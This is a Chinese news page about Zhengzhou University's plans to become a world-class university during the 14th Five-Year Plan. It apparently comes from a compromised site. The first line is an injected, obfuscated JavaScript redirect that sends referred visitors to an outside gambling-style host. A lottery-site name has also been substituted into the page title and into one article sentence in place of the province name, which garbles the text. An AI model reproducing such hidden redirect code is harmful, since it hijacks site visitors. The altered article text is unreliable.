var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 媒体聚焦

建设一流大学 郑大如何发力


发布日期:2021-09-25 09:17来源:河南日报 阅读次数:

  省委、省政府一直高度重视郑州大学世界一流大学建设。进入“十四五”后,郑州大学将如何发力,推进“双一流”大学建设?

  9月24日,在省政府新闻办举行的新闻发布会上,中国工程院院士、郑州大学校长刘炯天表示,一流大学建设是国家创新高地建设的重要组成部分。近年来,在省委、省政府的坚强领导和大力支持下,郑州大学在一流大学建设方面取得了显著进步。

  前瞻30年、面向“十四五”,郑州大学明确了要坚持高水平研究型大学的定位和推进世界一流大学建设的战略目标,并研究制定了一流大学建设和体制机制改革专项方案。未来,郑州大学将锚定目标、鼓足干劲,实现五年后学科水平、创新服务能力、综合办学实力与学校影响力等显著提升,努力成为中国竞彩网建设国家创新高地的重要支点。

  围绕这个目标郑州大学要完成四项任务。一是落实立德树人的根本任务;二是推进研究型大学转型期的创新能力的提升;三是推动人才汇聚和高水平的师资队伍的建设;四是对表新型研究型大学治理体系的建设和体制机制的改革。